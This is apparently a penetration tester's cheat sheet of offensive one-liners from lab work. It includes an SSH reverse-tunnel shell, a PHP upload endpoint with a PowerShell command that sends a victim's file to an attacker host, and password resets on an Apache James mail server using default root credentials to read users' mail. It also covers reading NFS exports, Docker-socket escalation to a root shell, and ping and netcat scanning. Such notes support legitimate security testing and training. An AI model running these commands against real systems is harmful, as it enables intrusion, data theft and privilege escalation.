Random Bits
stop output of errors in cmd
COMMAND 2> /dev/null
web servers
# php
php -S 0.0.0.0:8000
# ruby
ruby -run -e httpd . -p 9000
# busybox
busybox httpd -f -p 10000SSH
Rev shell
ssh.exe -R 48172 -N
Output to null
Ssh -o "UserKnownHostsFile=/dev/null" -N -o "StrictHostKeyChecking no" -i "c:/Software/key"
ssh -oKexAlgorithms=XXX -oHostKeyAlgorithms=XXX
File upload
Apache
On kali – put inside /var/www/html/, create a uploads folder and chown it to www-data, then start apache:
<?php
$uploaddir = '/var/www/uploads/';
$uploadfile = $uploaddir . $_FILES['file']['name'];
move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile)
?>On windows :
powershell (New-Object System.Net.WebClient).UploadFile('http://10.11.0.4/upload.php', 'important.docx')Apache James
Change password to users using root:root against port 4555, then check mailboxes for info. Can use the following:
Listusers
Setpassword mailadmin 1234
for user in mailadmin marcus jenny joe45 ryuu john; do (echo USER $user; sleep 1s; echo PASS 1234; sleep 1s; echo LIST; sleep 1s; echo QUIT)| nc -nvC 10.11.1.72 110; donePop3
USER username
PASS password
LIST
RETR 1NFS
Enumerations:
Showmout -e 10.11.1.72
Mount:
Mount -t nfs -o vers=2 -o nolock 10.11.1.72:/home /nfs
** if unreadable file – change owndership to the value of the file 😉 ***
Docker
useful commands:
docker ps #show installed dockers
docker container exec -it CONTAINER_ID /bin/bash #interactive shell on docker
docker images #show all installed dockerssocket write privesc:
docker -H unix:///var/run/docker.sock run -v /:/host -it ubuntu chroot /host /bin/bash
docker -H unix:///var/run/docker.sock run -it --privileged --pid=host debian nsenter -t 1 -m -u -n -i shone line scanners
Ping:
Windows:
for /L %i in (1,1,255) do @ping -n 1 -w 200 10.5.5.%i > nul && echo 10.5.5.%i is up.Linux:
for i in {1..254} ;do (ping -c 1 192.168.1.$i | grep "bytes from" &) ;doneNetcat
TCP:
nc -nvv -w 1 -z 10.11.1.220 3388-3390
UDP:
nc -nv -u -z -w 1 10.11.1.115 160-162
Last updated